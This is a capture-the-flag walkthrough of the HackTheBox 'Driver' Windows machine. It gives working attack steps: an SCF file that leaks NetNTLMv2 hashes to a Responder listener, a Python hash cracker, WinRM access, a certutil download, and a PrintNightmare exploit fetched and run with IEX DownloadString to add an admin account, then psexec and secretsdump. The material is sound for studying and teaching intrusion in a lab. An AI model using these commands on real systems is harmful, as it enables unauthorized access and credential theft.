Driver HackTheBox WalkThrough
This is the Driver HackTheBox machine walkthrough. In this writeup I demonstrate step by step how I rooted the Driver HTB machine. Before starting, a few facts about the box: it is a Windows machine with IP address 10.10.11.106, and its maker rated it easy.
First of all, connect to the HackTheBox VPN and confirm connectivity to the Driver machine by pinging its IP 10.10.11.106. If that works, it is time to start. As usual, I began by scanning the machine.
Scanning gives us an idea of how to proceed: it shows which services listen on which ports, lets us grab their banners, and sometimes points straight at a vulnerability. I used nmap for this task; the commands and results are given below:
$ sudo nmap -p- --min-rate 10000 -oN nmap-alltcp.nmap 10.10.11.106
$ sudo nmap -p 80,135,445,5985 -sV -sC -oA nmap-tcpscripts 10.10.11.106
The full port scan with nmap revealed four open ports.
Microsoft IIS 10.0 is running on port 80. IIS 10.0 is the current major version of the web server, so there is no known public exploit for the server software itself; anything interesting here will be in the application hosted on it, not in IIS.
MSRPC is running on port 135.
SMB is running on port 445.
Microsoft HTTPAPI is running on port 5985. This is the WinRM (Windows Remote Management) port, so once we obtain any valid user credential we can get a remote shell on the Driver machine through it.
I began my enumeration with port 445. I tried to establish a null session on port 445 but got an ACCESS_DENIED message. Then, browsing to http://10.10.11.106, I found a login page. Trying a default credential like admin worked and I was logged in. The site is a Firmware Update Center where users upload their firmware and the uploaded file is tested by the driver testing team. One thing is clear from that description: whatever we upload to this site will be opened by someone on the testing team.
But before going further, let us add driver.htb to our hosts file, which lives in the /etc directory.
Hosts File After Modification
$ cat /etc/hosts
Going to http://driver.htb/fw_up.php I found a file upload function. Since the application is written in PHP I tried to upload a PHP web shell, but it did not execute. Files with other extensions such as asp did not execute either. A directory brute-force of http://driver.htb found nothing useful. After some googling I found that an SCF File Attack is possible when the SMB port is open and a file share is available; for more about this attack see the PentestLab blog post. An SCF file is a Windows shell command file: when Explorer renders a folder containing one it fetches the icon named in IconFile, and if that is a UNC path the victim's machine authenticates to our SMB server, leaking the user's NetNTLMv2 response. To perform the SCF File Attack follow these steps:
1. First create a file with the following contents and save it with a name starting with @ (the @ symbol sorts share.scf to the top of the share listing) and the .scf extension. Don't forget to replace the IP address with your tun0 IP.
[Shell]
Command=2
IconFile=\\10.10.17.97\info.ico
[Taskbar]
Command=ToggleDesktop
$ cat @share.scf
2. Start responder to listen on your tun0 interface:
$ sudo responder -wrf --lm -v -I tun0
3. Finally, upload the @share.scf file at http://driver.htb/fw_up.php.
Because our uploaded file is opened by a user on the Driver machine, when Explorer renders @share.scf it tries to connect to the SMB share at 10.10.17.97 (my VPN IP) to fetch info.ico. There is no real share at my IP; responder answers the connection instead, plays the SMB server the user is trying to reach, and captures the NetNTLMv2 response during the authentication exchange, dumping it to the screen. Following the steps above, I got the NetNTLMv2 hash of the user tony.
We can confirm the type of hash with the hashid tool.
Identifying the Hash
$ hashid 'tony::DRIVER:6a72987a59f37482:C126044A184E5D4B302403810B1657EB:01010000000000001F7189B530D3D7019194E00169BF593000000000020000000000000000000000'
Let us crack the hash with John the Ripper, an offline password cracker. You can also use another offline cracker such as Hashcat. A John cheat sheet can be found at Pentestmonkey. Note that John takes the wordlist through --wordlist; a bare second path would be loaded as another hash file.
$ echo "tony::DRIVER:6a72987a59f37482:C126044A184E5D4B302403810B1657EB:01010000000000001F7189B530D3D7019194E00169BF593000000000020000000000000000000000" > hash.txt
$ john --format=netntlmv2 --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
$ john --format=netntlmv2 --show hash.txt
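What John actually verifies for --format=netntlmv2 is small enough to write out. The following is an added example, not code from the walkthrough or from John: it recomputes the NetNTLMv2 proof (NTProofStr) from a candidate password and compares it with the captured one. The MD4 routine is included because Python builds on OpenSSL 3 often refuse hashlib.new("md4"). The sample line at the bottom is constructed here (the page's server challenge with a made-up blob and a proof computed for "liltony"); it is not the capture from Responder.

```python
"""NetNTLMv2 offline verification (MS-NLMP), as John does for netntlmv2."""
import hashlib
import hmac
import struct

MASK = 0xFFFFFFFF


def _rotl(x, n):
    return ((x << n) | (x >> (32 - n))) & MASK


def md4(data: bytes) -> bytes:
    """MD4 per RFC 1320; an NT hash is MD4 over the UTF-16LE password."""
    msg = bytearray(data) + b"\x80"
    while len(msg) % 64 != 56:
        msg += b"\x00"
    msg += struct.pack("<Q", len(data) * 8)
    f = lambda x, y, z: (x & y) | (~x & z)
    g = lambda x, y, z: (x & y) | (x & z) | (y & z)
    h3 = lambda x, y, z: x ^ y ^ z
    state = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = state
        for i in range(16):  # round 1: message words in order
            a = _rotl((a + f(b, c, d) + x[i]) & MASK, (3, 7, 11, 19)[i % 4])
            a, b, c, d = d, a, b, c
        for i in range(16):  # round 2: words 0,4,8,12,1,5,9,13,...
            k = (i % 4) * 4 + i // 4
            a = _rotl((a + g(b, c, d) + x[k] + 0x5A827999) & MASK, (3, 5, 9, 13)[i % 4])
            a, b, c, d = d, a, b, c
        for i, k in enumerate((0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)):  # round 3
            a = _rotl((a + h3(b, c, d) + x[k] + 0x6ED9EBA1) & MASK, (3, 9, 11, 15)[i % 4])
            a, b, c, d = d, a, b, c
        state = [(s + v) & MASK for s, v in zip(state, (a, b, c, d))]
    return struct.pack("<4I", *state)


def nt_hash(password: str) -> bytes:
    return md4(password.encode("utf-16le"))


def ntlmv2_proof(password, user, domain, server_challenge: bytes, blob: bytes) -> bytes:
    """NTLMv2 key = HMAC-MD5(NT hash, UTF-16LE(UPPER(user) + domain));
    NTProofStr = HMAC-MD5(NTLMv2 key, server challenge || blob)."""
    key = hmac.new(nt_hash(password), (user.upper() + domain).encode("utf-16le"), hashlib.md5).digest()
    return hmac.new(key, server_challenge + blob, hashlib.md5).digest()


def parse_netntlmv2(line: str) -> dict:
    """Responder/John line format: user::domain:serverchallenge:ntproofstr:blob (hex fields)."""
    user, _, domain, chal, proof, blob = line.strip().split(":")
    return {"user": user, "domain": domain, "challenge": bytes.fromhex(chal),
            "proof": bytes.fromhex(proof), "blob": bytes.fromhex(blob)}


def format_netntlmv2(user, domain, challenge: bytes, proof: bytes, blob: bytes) -> str:
    return f"{user}::{domain}:{challenge.hex()}:{proof.hex().upper()}:{blob.hex()}"


def crack(line: str, wordlist):
    """Return the first candidate whose recomputed NTProofStr matches the capture, else None."""
    h = parse_netntlmv2(line)
    for pw in wordlist:
        if hmac.compare_digest(ntlmv2_proof(pw, h["user"], h["domain"], h["challenge"], h["blob"]), h["proof"]):
            return pw
    return None


# Constructed sample (not the page's capture): page's server challenge, a minimal
# blob (resp type 1/1, zero timestamp, client challenge 00..07, empty AV pairs),
# and a proof computed for the password "liltony".
SAMPLE_CHALLENGE = bytes.fromhex("6a72987a59f37482")
SAMPLE_BLOB = bytes.fromhex("0101000000000000") + b"\x00" * 8 + bytes(range(8)) + b"\x00" * 8
SAMPLE_LINE = format_netntlmv2(
    "tony", "DRIVER", SAMPLE_CHALLENGE,
    ntlmv2_proof("liltony", "tony", "DRIVER", SAMPLE_CHALLENGE, SAMPLE_BLOB), SAMPLE_BLOB)

if __name__ == "__main__":
    print(nt_hash("password").hex())  # 8846f7eaee8fb117ad06bdd830b7586c, the well-known NT hash
    print(crack(SAMPLE_LINE, ["123456", "password", "liltony", "tony"]))  # liltony
```

The same crack() can be pointed at the captured line in hash.txt with rockyou as the wordlist; it is far slower than John, but it shows exactly which two HMAC-MD5 computations the cracker is racing through per candidate, and why the username is upper-cased while the domain is used as captured.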
The cracked password is liltony, so we have the credential tony:liltony. Since port 5985 is open we can use evil-winrm to connect to the Driver machine with this credential. Let us connect and get a user shell.
Getting User Shell
$ evil-winrm -u 'tony' -p 'liltony' -P 5985 -i 10.10.11.106
We have successfully connected to Driver machine. Let us capture user flag.
Capture User Flag
$ type C:\Users\tony\Desktop\user.txt
To escalate privileges to admin we first have to find a privilege escalation vector. Post-exploitation enumeration scripts are the quickest way to find one; check this link if you need more information about such tools.
Finding PrivEsc Vector
I used winPEAS this time. It is the best-known post-exploitation enumeration tool for Windows and can be found at this repo. Before we can run winPEAS on the Driver machine we need to transfer it from our Kali machine. Follow the steps below to run winPEAS on the Driver machine.
On Kali Machine
$ wget https://github.com/carlospolop/PEASS-ng/raw/master/winPEAS/winPEASexe/binaries/Obfuscated%20Releases/winPEASx64.exe
$ python3 -m http.server 9001
On Driver Machine
$ cd C:\Temp\
$ certutil.exe -urlcache -split -f "http://10.10.17.97:9001/winPEASx64.exe" winPEASx64.exe
Among the winPEAS output, the spoolsv service was shown running locally; for more info about this service check this article. spoolsv is the Windows Print Spooler, and the name of the box, Driver, reminded me of the Windows Print Spooler Remote Code Execution Vulnerability known as PrintNightmare (CVE-2021-34527). Microsoft published its advisory on 1 July 2021 and shipped out-of-band patches on 6 July 2021; Windows 10, Windows Server 2016 and almost every other supported version were affected. A closely related local variant, CVE-2021-1675, had already been fixed in the June 2021 update, and the exploit used below is named after that CVE. Both abuse the RpcAddPrinterDriverEx call: an authenticated user asks the spooler, which runs as SYSTEM, to install a printer driver whose DLL the user controls, and that DLL then runs as SYSTEM. Check the complete information about this vulnerability on the Microsoft site. A very good article on how to exploit it is written by 0xdf; check his article.
When I tried to exploit this vulnerability, I easily got an admin shell. So our privilege escalation vector is
Privilege Escalation via Vulnerable Service Version.
Note: this exploit only works while the spoolsv service is running; otherwise it fails with an error like "Failed to get current driver lists". If you don't see the spoolsv process, reset the machine.
You can check for the process with the following command:
$ ps | findstr "spoolsv"
Performing Privilege Escalation
To perform privilege escalation and getting admin shell follow the given steps.
On Kali Machine
$ git clone https://github.com/calebstewart/CVE-2021-1675
$ cd CVE-2021-1675/
$ echo "Invoke-Nightmare -NewUser 'newadmin' -NewPassword 'SuperSecurePassword'">>CVE-2021-1675.ps1
$ python3 -m http.server 9001
On Driver Machine
$ IEX(New-Object Net.WebClient).DownloadString("http://10.10.17.97:9001/CVE-2021-1675.ps1")
The exploit adds a new user newadmin with password SuperSecurePassword and puts it in the local Administrators group. We can list all members of the Administrators group with the following command.
$ net localgroup administrators
Getting Admin Shell
Since we now hold an admin credential we can access the SMB shares on port 445 and have write permission on the C$ share of the Driver machine, so we can use Impacket's psexec.py to get an admin shell.
PsExec is a remote administration tool, similar in spirit to SSH on Linux: it copies a service binary to a writable share (ADMIN$ by default), creates a service that runs it, and talks to it over a named pipe. Since port 5985 is open we could equally use evil-winrm with the newadmin / SuperSecurePassword credential to connect to the Driver machine.
$ impacket-psexec newadmin@10.10.11.106
This drops us into a shell as NT AUTHORITY\SYSTEM. Now let us grab the root flag.
Capture Root Flag
$ type C:\Users\Administrator\Desktop\root.txt
Dumping Admin Hash
$ impacket-secretsdump newadmin@10.10.11.106
This was how I rooted the Driver HackTheBox machine. I learnt a lot from this box and hope you also learnt something new. Thanks for reading this walkthrough. For any query or suggestion about it, feel free to write to us at [email protected].